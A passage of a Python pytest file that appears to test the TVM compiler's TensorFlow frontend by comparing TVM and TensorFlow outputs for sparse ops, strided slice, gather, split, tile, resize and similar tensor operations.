np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, -1], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([250, 40], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_reshape(
sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn
):
""" sparse_reshape op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_reshape(sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn)
#######################################################################
# Sparse Segment Variants
# ------------
def _test_sparse_segment_variant(
tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn=False
):
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
indices = tf.placeholder(shape=[None], dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf_op(
data, indices, segment_ids, num_segments=num_segments, name="sparse_segment_variant"
)
compare_tf_with_tvm(
[data_np, indices_np, segment_ids_np],
[data.name, indices.name, segment_ids.name],
["sparse_segment_variant:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, indices_np, segment_ids_np, num_segments",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 3, 4], dtype=np.int32),
np.array([0, 1, 1], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
4,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
100,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
None,
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float64),
np.array([0, 1, 2], dtype=np.int32),
np.array([0, 0, 1], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
9,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 5, 5, 5, 5], dtype=np.int32),
6,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
@pytest.mark.parametrize(
"tf_op",
[
tf.sparse.segment_sum,
tf.sparse.segment_sqrt_n,
tf.sparse.segment_mean,
],
)
def test_forward_sparse_segment_sum_variants(
tf_op,
data_np,
indices_np,
segment_ids_np,
num_segments,
use_dyn,
):
"""sparse segment sum variants tests"""
_test_sparse_segment_variant(tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn)
#######################################################################
# Math SegmentSum
# ------------
def _test_math_segment_sum(data_np, segment_ids_np, use_dyn=False):
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf.math.segment_sum(data, segment_ids, name="segment_sum")
compare_tf_with_tvm(
[data_np, segment_ids_np],
[data.name, segment_ids.name],
["segment_sum:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, segment_ids_np",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 0, 0, 1, 1, 1], dtype=np.int32),
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((6, 4, 5)),
np.array([0, 0, 1, 2, 2, 3], dtype=np.int64),
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float32),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 0, 0, 1, 2, 3, 4, 4, 5], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_math_segment_sum(data_np, segment_ids_np, use_dyn):
"""math segment sum test"""
_test_math_segment_sum(data_np, segment_ids_np, use_dyn)
# tensorflow.compat.v1.sparse_to_dense
# ---------------
def _test_sparse_to_dense(sparse_indices, sparse_values, default_value, output_shape):
with tf.Graph().as_default():
indices = tf.placeholder(
shape=sparse_indices.shape, dtype=str(sparse_indices.dtype), name="indices"
)
values = tf.placeholder(
shape=sparse_values.shape, dtype=str(sparse_values.dtype), name="values"
)
oshape = tf.constant(output_shape, shape=output_shape.shape, dtype=str(output_shape.dtype))
if default_value == None:
output = tf.sparse_to_dense(indices, oshape, values)
compare_tf_with_tvm(
[sparse_indices, sparse_values], ["indices:0", "values:0"], output.name
)
else:
dv = tf.placeholder(shape=(), dtype=str(default_value.dtype), name="default_value")
output = tf.sparse_to_dense(indices, oshape, values, dv)
compare_tf_with_tvm(
[sparse_indices, sparse_values, default_value],
["indices:0", "values:0", "default_value:0"],
output.name,
)
def test_forward_sparse_to_dense():
# scalar
_test_sparse_to_dense(
sparse_indices=np.int32(1),
sparse_values=np.int32(3),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3, 3, 3]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector nXd
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0], [1, 2]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([3, 4]).astype("int32"),
)
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0, 0], [1, 2, 3]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(4),
output_shape=np.array([2, 3, 4]).astype("int32"),
)
# floats
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=np.float32(3.5),
output_shape=np.array([5]).astype("int32"),
)
# default value not specified
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=None,
output_shape=np.array([5]).astype("int32"),
)
#######################################################################
# tensorflow.sparse.to_dense
# ---------------
def _test_sparse_to_dense_v2(indices, values, A_shape, dtype, default_value=None):
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
result = tf.sparse.to_dense(A_sp, default_value=default_value)
compare_tf_with_tvm([], [], result.name)
def test_forward_sparse_to_dense_v2():
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32")
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32", 0.3)
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32", 1.3)
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32", 1.9)
#######################################################################
# tensorflow.sparse.add
# ----------------------------------
def _test_sparse_add(indices, values, A_shape, B_shape, dtype, flip=False):
""" One iteration of tf.sparse.add """
# TODO(ANSHUMAN87): support cuda
# TODO(ANSHUMAN87): support both sparse input case
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(
indices=indices, values=np.array(values).astype(dtype), dense_shape=A_shape
)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
# TODO(ANSHUMAN87): support user input threashold values
if flip:
result = tf.sparse.add(B, A_sp, threshold=0)
else:
result = tf.sparse.add(A_sp, B, threshold=0)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name, no_gpu=True)
def test_sparse_add():
""" sparse.add op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
for dtype_inp in ["float32", "float64", "int32"]:
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp)
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp, True)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp, True)
#######################################################################
# StridedSlice
# ------------
def _test_stridedslice(
ip_shape,
begin,
end,
stride,
dtype,
begin_mask=0,
end_mask=0,
new_axis_mask=0,
shrink_axis_mask=0,
ellipsis_mask=0,
):
""" One iteration of a Stridedslice """
tf.reset_default_graph()
np_data = np.random.uniform(size=ip_shape).astype(dtype)
with tf.Graph().as_default():
if len(ip_shape) == 0:
in_data = tf.constant(np_data, dtype)
else:
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.strided_slice(
in_data,
begin,
end,
stride,
begin_mask=begin_mask,
end_mask=end_mask,
new_axis_mask=new_axis_mask,
shrink_axis_mask=shrink_axis_mask,
ellipsis_mask=ellipsis_mask,
name="strided_slice",
)
if len(ip_shape) == 0:
compare_tf_with_tvm(None, "", "strided_slice:0")
else:
compare_tf_with_tvm(np_data, "in_data:0", "strided_slice:0")
def test_forward_stridedslice():
"""test StridedSlice"""
_test_stridedslice([], [0], [0], [1], "float32", new_axis_mask=1)
_test_stridedslice([2], [1], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 1], [0], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 3, 4], [0], [1], [1], "float32", shrink_axis_mask=8)
_test_stridedslice([3, 4, 3], [1, -1, 0], [4, -5, 3], [2, -1, 1], "float32")
_test_stridedslice([3, 4, 3], [1, 0], [4, 3], [2, 1], "float32", ellipsis_mask=8)
_test_stridedslice([3, 4, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0, 1], [4, 2, 2], [2, 1, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 3], [1, 1, 0], [4, 4, 2], [2, 1, 1], "float32", new_axis_mask=5)
_test_stridedslice(
[3, 4, 3], [1, 1, 1], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=4
)
_test_stridedslice(
[6, 4, 5], [1, 1, 1], [6, 3, 4], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=5
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=4, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=2
)
_test_stridedslice((3, 4), [1, 0], [4, 4], [1, 1], "float32", shrink_axis_mask=2)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=1, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6], [0, 0], [2, 3], [1, 1], "float32", shrink_axis_mask=5, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=5,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=8,
end_mask=8,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=16,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[1, 2, 0, -3],
[4, 5, 3, 3],
[2, 2, 1, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=8,
)
_test_stridedslice(
[1, 13, 13, 3, 2],
[0, 0],
[1, 1],
[1, -1],
"float32",
ellipsis_mask=1,
begin_mask=2,
end_mask=2,
)
#######################################################################
# FloorDiv, RealDiv
# -----------------
def _test_forward_divide(ip_shape, dtype):
np_numer = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_denomin = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
denominator = tf.placeholder(dtype, ip_shape, name="denomin")
tf.math.divide(numerator, denominator, name="RealDiv")
compare_tf_with_tvm([np_numer, np_denomin], ["numer:0", "denomin:0"], "RealDiv:0")
def _test_forward_floordiv(ip_shape, dtype):
np_numer = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
tf.math.floordiv(numerator, tf.constant(5, dtype=dtype), name="FloorDiv")
compare_tf_with_tvm([np_numer], ["numer:0"], "FloorDiv:0")
def test_forward_divide():
"""test FloorDiv, RealDiv"""
_test_forward_divide((4,), "int32")
_test_forward_divide((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "int32")
#######################################################################
# FloorMod
# --------
def _test_forward_floormod(in_shape, if_shape, dtype):
np_numer = np.random.uniform(1, 100, size=in_shape).astype(dtype)
np_factor = np.random.uniform(1, 100, size=if_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, in_shape, name="numer")
factor = tf.placeholder(dtype, if_shape, name="factor")
tf.floormod(numerator, factor, name="FloorMod")
compare_tf_with_tvm([np_numer, np_factor], ["numer:0", "factor:0"], "FloorMod:0")
def test_forward_floormod():
"""test FloorMod"""
_test_forward_floormod((10,), (10,), "float32")
_test_forward_floormod((8, 2), (1,), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "int32")
#######################################################################
# TruncateMod
# -----------
def _test_forward_truncatemod(ip_shape, dtype):
np_data_1 = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_data_2 = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data_1 = tf.placeholder(dtype, ip_shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, ip_shape, name="in_data_2")
tf.truncatemod(in_data_1, in_data_2, name="truncatemod")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "truncatemod:0")
def test_forward_truncatemod():
"""test TruncateMod"""
_test_forward_truncatemod((4, 3, 7), "int32")
#######################################################################
# Gather, GatherV2
# --------------------------
def _test_gather(ip_shape, indice_shape, indice_value, axis, batch_dims, dtype):
""" One iteration of a GatherV2 """
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
indices = tf.placeholder("int32", indice_shape, name="indices")
out = tf.gather(in_data, indices, axis=axis, batch_dims=batch_dims)
np_data = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
def _fill_indices(indice_value):
indices = np.array(ip_shape, dtype=dtype)
if isinstance(indice_value, int):
indices = np.array([indice_value], dtype="int32")
else:
indices = np.asarray(indice_value, dtype="int32")
return indices
np_indices = _fill_indices(indice_value)
compare_tf_with_tvm([np_data, np_indices], ["in_data:0", "indices:0"], out.name)
def test_forward_gather():
"""test Gather/GatherV2 layer"""
_test_gather((4,), (1,), 1, 0, 1, "int32")
_test_gather((4,), (1,), 1, 0, 0, "float32")
_test_gather((1, 4), (1,), [0], 0, 0, "int32")
_test_gather((4,), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "float32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 1, 0, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "float32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 0, 0, "int32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 2, 0, "int32")
_test_gather((4, 3, 5, 6), (1, 4), [[2, 1, 0, 0]], 0, 0, "float32")
_test_gather((2, 2), (2, 2), [[0, 0], [0, 0]], 1, 1, "float32")
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 2, 2, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 1, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 2, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 0, "float32"
)
#######################################################################
# GatherND
# --------------------------
def _test_gather_nd(ip_shape, indice_value, dtype):
"""test operator GatherNd"""
np_data = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.gather_nd(in_data, indices=indice_value, name="gather_nd")
compare_tf_with_tvm([np_data], ["in_data:0"], "gather_nd:0")
def test_forward_gather_nd():
"""test operator GatherNd"""
_test_gather_nd((2, 2), [[0, 0], [1, 1]], "float32")
_test_gather_nd((2, 2, 2), [[1, 0, 0], [0, 0, 0]], "float32")
_test_gather_nd((4,), [1], "float32")
_test_gather_nd((4,), [1], "int32")
_test_gather_nd((1, 4), [0, 3], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "float32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((4, 3, 5, 6), [[2, 1, 0, 0]], "float32")
_test_gather_nd((3, 3, 3), [[[2, 1]]], "int32")
#######################################################################
# BiasAdd
# -------
def test_forward_bias_add():
"""test Op BiasAdd"""
def check_bias_add(lh_shpae, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shpae).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.nn.bias_add(lft_data, rgt_data, name="BiasAdd")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "BiasAdd:0")
check_bias_add((10, 8, 16, 32), (32,), dtype="int32")
check_bias_add((10, 20), (20,), dtype="float32")
#######################################################################
# Split
# -----
def _test_split(in_shape, axis, num_or_size_splits, dtype):
np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
""" One iteration of a Split """
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
num_split = (
len(num_or_size_splits) if isinstance(num_or_size_splits, list) else num_or_size_splits
)
split = tf.split(in_data, num_or_size_splits, axis=axis)
relu = [tf.nn.relu(i) for i in split]
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in relu])
# and now test together with concat
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
splitted = tf.split(in_data, num_or_size_splits, axis=axis)
concat = tf.concat(splitted, axis)
compare_tf_with_tvm([np_data], "in_data:0", concat.name)
def test_forward_split():
"""test split layer"""
# rank 1
_test_split((3,), 0, 1, "float32")
_test_split((3,), 0, 3, "float32")
_test_split((6,), 0, 3, "float32")
# rank 2
_test_split((6, 2), 0, 3, "float32")
_test_split((2, 6), 1, 6, "float32")
# rank 3
_test_split((6, 2, 4), 0, 2, "int32")
_test_split((2, 6, 4), 1, 3, "float32")
_test_split((2, 4, 6), 2, 1, "float32")
# rank 4
_test_split((6, 1, 3, 5), 0, 3, "float32")
_test_split((1, 6, 3, 5), 1, 3, "float32")
_test_split((1, 3, 6, 5), 2, 3, "float32")
_test_split((1, 3, 5, 6), 3, 3, "float32")
# split along negative axis
_test_split((6, 1, 3, 5), -4, 3, "float32")
_test_split((1, 6, 3, 5), -3, 3, "float32")
_test_split((1, 3, 6, 5), -2, 3, "float32")
_test_split((1, 3, 5, 6), -1, 3, "float32")
# size_splits list
_test_split((6,), 0, [1, 2, 3], "int32")
_test_split((3, 6, 4), -2, [1, 4, 1], "float32")
######################################################################
# TopKV2
# ------
def _test_forward_top_k_v2(in_shape, k):
np_data = np.random.uniform(-100, 100, size=in_shape).astype("float32")
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder("float32", in_shape, name="in_data")
tf.math.top_k(in_data, k, name="TopK")
compare_tf_with_tvm([np_data], ["in_data:0"], "TopK:0")
def test_forward_top_k_v2():
_test_forward_top_k_v2((3,), 1)
_test_forward_top_k_v2((3,), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
#######################################################################
# Unstack
# -------
def _test_unstack(ip_shape, axis, dtype):
np_data = np.random.uniform(-5, 5, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
unstack = tf.unstack(in_data, axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in unstack])
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.stack(tf.unstack(in_data, axis=axis), axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], "stack:0")
def test_forward_unstack():
"""test unstack layer"""
_test_unstack((6,), 0, "int32")
_test_unstack((2, 6), 1, "float64")
# negative axis
_test_unstack((1, 4), -1, "int32")
_test_unstack((3, 6, 4), -2, "float32")
#######################################################################
# Tile
# ----
def _test_tile(in_shape, multiples, dtype):
np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.tile(in_data, multiples=multiples, name="tile")
compare_tf_with_tvm([np_data], ["in_data:0"], "tile:0")
def test_forward_tile():
"""test Tile"""
_test_tile((2,), (3,), "int32")
_test_tile((2, 2), (2, 3), "float32")
_test_tile((2, 4, 6), (6, 7, 8), "float64")
#######################################################################
# ClipByValue
# -----------
def _test_forward_clip_by_value(ip_shape, clip_value_min, clip_value_max, dtype):
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.clip_by_value(in_data, clip_value_min, clip_value_max, name="ClipByValue")
np_data = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
compare_tf_with_tvm([np_data], ["in_data:0"], "ClipByValue:0")
def test_forward_clip_by_value():
"""test ClipByValue op"""
if tf.__version__ < LooseVersion("1.9"):
_test_forward_clip_by_value((4,), 0.1, 5.0, "float32")
_test_forward_clip_by_value((4, 4), 1, 5, "int32")
#######################################################################
# Multi Input to graph
# --------------------
def test_forward_multi_input():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
out = tf.multiply(out1, out2, name="out")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
compare_tf_with_tvm(
[in_data, in_data, in_data, in_data], ["in1:0", "in2:0", "in3:0", "in4:0"], "out:0"
)
#######################################################################
# Multi Output to Graph
# ---------------------
def test_forward_multi_output():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
in_data = [in_data] * 4
in_name = ["in1:0", "in2:0", "in3:0", "in4:0"]
out_name = ["out1:0", "out2:0"]
out_node = [out.strip(":0") for out in out_name]
in_node = [inp.strip(":0") for inp in in_name]
with tf.Session() as sess:
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
tvm_output = run_tvm_graph(
final_graph_def, in_data, in_node, target="llvm", out_names=out_node, num_output=2
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Resize Bilinear, Nearest_Neighbor
# ---------------------------------
def _test_resize_bilinear(in_shape, to_shape, align_corners):
""" One iteration of resize bilinear """
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_bilinear(in_data, shape_data, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_bilinear_from_tensor(in_shape, align_corners):
"""One iteration of resize bilinear with non-constant output shape, requires
value inference to get proper output shape."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], None, None, in_shape[3]], dtype=data.dtype
)
to_shape = tf.shape(in_data)[1:3]
tf.image.resize_bilinear(in_data, to_shape, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_nearest_neighbor(in_shape, to_shape):
""" One iteration of resize nearest neighbor """
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_nearest_neighbor(in_data, shape_data, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
